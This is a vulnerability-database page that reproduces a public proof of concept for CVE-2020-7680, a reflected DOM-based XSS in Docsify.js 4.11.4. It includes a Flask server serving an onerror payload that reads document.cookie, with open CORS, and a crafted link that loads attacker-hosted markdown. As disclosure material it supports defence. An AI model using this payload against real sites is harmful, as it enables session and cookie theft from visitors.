Vulners
Lucene search
Docsify.js 4.11.4 - Reflective Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Docsify 4.11.4 - Reflective Cross-Site Scripting Vulnerability | 22 Jul 202000:00 | – | zdt |
| docsify 4.11.6 Cross Site Scripting Vulnerability | 22 Feb 202100:00 | – | zdt |
 | CVE-2021-23342 | 19 Feb 202116:30 | – | attackerkb |
 | CVE-2020-7680 | 19 Feb 202120:51 | – | circl |
 | Docsify Cross-Site Scripting Vulnerability | 21 Jul 202000:00 | – | cnvd |
 | CVE-2020-7680 | 20 Jul 202015:22 | – | cve |
 | CVE-2020-7680 | 20 Jul 202015:22 | – | cvelist |
 | EUVD-2021-1169 | 7 Oct 202500:30 | – | euvd |
 | Cross-site Scripting in docsify | 18 May 202101:53 | – | github |
 | Cross-Site Scripting (XSS) | 1 Mar 202119:50 | – | nodejs |
10
# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
# Date: 2020-06-22
# Exploit Author: Amin Sharifi
# Vendor Homepage: https://docsify.js.org
# Software Link: https://github.com/docsifyjs/docsify
# Version: 4.11.4
# Tested on: Windows 10
# CVE : CVE-2020-7680
docsify.js uses fragment identifiers (parameters after # sign) to load
resources from server-side .md files. it then renders the .md file inside
the HTML page.
For example : https://docsify.js.org/#/quickstart sends an ajax to
https://docsify.js.org/quickstart.md and renders it inside the html page.
due to lack of validation it is possible to provide external URLs after the
/#/ and render arbitrary javascript/HTML inside the page which leads to
DOM-based Cross Site Scripting (XSS).
Steps to reproduce:
step 1. setup a server (for example I use flask here, for the POC im
hosting one on https://asharifi.pythonanywhere.com )
step 2. the server should respond to request to /README.md with a crafted
XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
also the CORS should be set so that other Origins would be able to send
ajax requests to the server so Access-Control-Allow-Origin must be set to *
(or to the specific domain that you wanna exploit) example code below:
-------------------------------------------------
from flask import Flask
import flask
app = Flask(__name__)
@app.route('/README.md')
def inject():
resp = flask.Response("Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp
------------------------------------------------------
step 3. craft the link for execution of the exploit
for example for https://docsify.js.org website you can create the link as
below
https://docsify.js.org/#//asharifi.pythonanywhere.com/README
(note that the mentioned domain is no longer vulnerable at the time writing
this report)
when a user visits this URL an ajax request will be sent to
asharifi.pythonanywhere.com/README.md and the response of the request will
be rendered inside the webpage which results in XSS payload being executed
on the page.
snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
Mitre CVE entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jul 2020 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.03162